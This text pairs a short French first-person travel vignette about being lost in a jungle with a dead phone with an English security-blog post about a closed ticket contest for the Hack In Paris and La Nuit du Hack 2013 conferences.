La jungle bruisse de mille bruits. C’est merveilleux. Moi qui n’ai jamais été un débrouillard, moi qui n’ai jamais réussi à organiser correctement une semaine dans un camping de la Costa Brava et dont le sens de l’orientation est inexistant, je découvre enfin le monde. Je ne sais même pas dans quelle ville je vais loger ce soir ni comment je vais m’y rendre. Je me laisse guider et je savoure chaque instant.

Tiens, le sentier se divise et un piquet esseulé m’indique que, un jour, un symbole jaune a du guider des touristes comme moi, perdu à 5 km de la lisière de la forêt.

Je sort mon téléphone de ma poche. L’écran est noir. J’appuie sur la touche plusieurs fois mais sans succès. Un oiseau tropical pousse un cri strident. Je sursaute, pose un regard inquiet autour de moi avant de replonger sur mon téléphone.

Hier soir, après avoir trié les photos de la journée vautré dans mon lit, j’ai eu la flemme d’aller le mettre à charger sur la seule prise de la chambre. Je m’étais dit que, étant donné sa vitesse de charge, je ferai ça durant le petit déjeuner.

Je crois que j’ai oublié. Ma batterie est morte. Les feuilles bruissent autour de moi. Un nouveau cri de l’oiseau me fait frisonner l’échine…

Photo par moi-même (tout arrive)

The contest is closed. All tickets have been assigned.

Dear readers, I’ve some gifts for you! I’m very proud (and surprised!) to have been nominated to the European Security Bloggers Awards in two categories: “Best Personal Security Blog” and “Best Security EU Twitter“. To thank you for these nominiations (and first of all for reading/following me), I’ve some tickets to distribute for two nice security events in Paris (DisneyLand Convention Center).

The first one is Hack In Paris which will be held from 17th to 21st of June. Then, La Nuit du Hack will follow during the weekend. Both are very good events with renowned international speakers. To give you an idea, have a look at my 2012 wrap-ups (day 1 and day 2). A first version of schedule has already been published. The organizers provided me 2 x 10 tickets for both conferences. It won’t be fair to simply distribute them to the first comers so here is a small contest! Answer the following question: (tip: the answer is on my blog)

“After the last edition of BlackHat Europe in Barcelona, I waited my flight back to home with a good friend of mine. Who is it?”

Send your answer by email only to xavier[at]rootshell[dot]be. The following information must be provided in the mail:

• Subject: Contest HIP/NDH 2013
• My friend’s nick, Twitter or full name
• Your ticket preference (HIP, NDH or both)

Good luck! Some rules:

• Be sure to attend the conference (in Paris, June 2013) and not waste tickets
• Travel & hotel costs are not covered and must be paid by the winners
• HIP tickets are not valid for trainings (only talks)

This year, I won’t be able to attend the conference during the week. But I will join Paris for the weekend, see you there!

PS: Don’t forget to vote!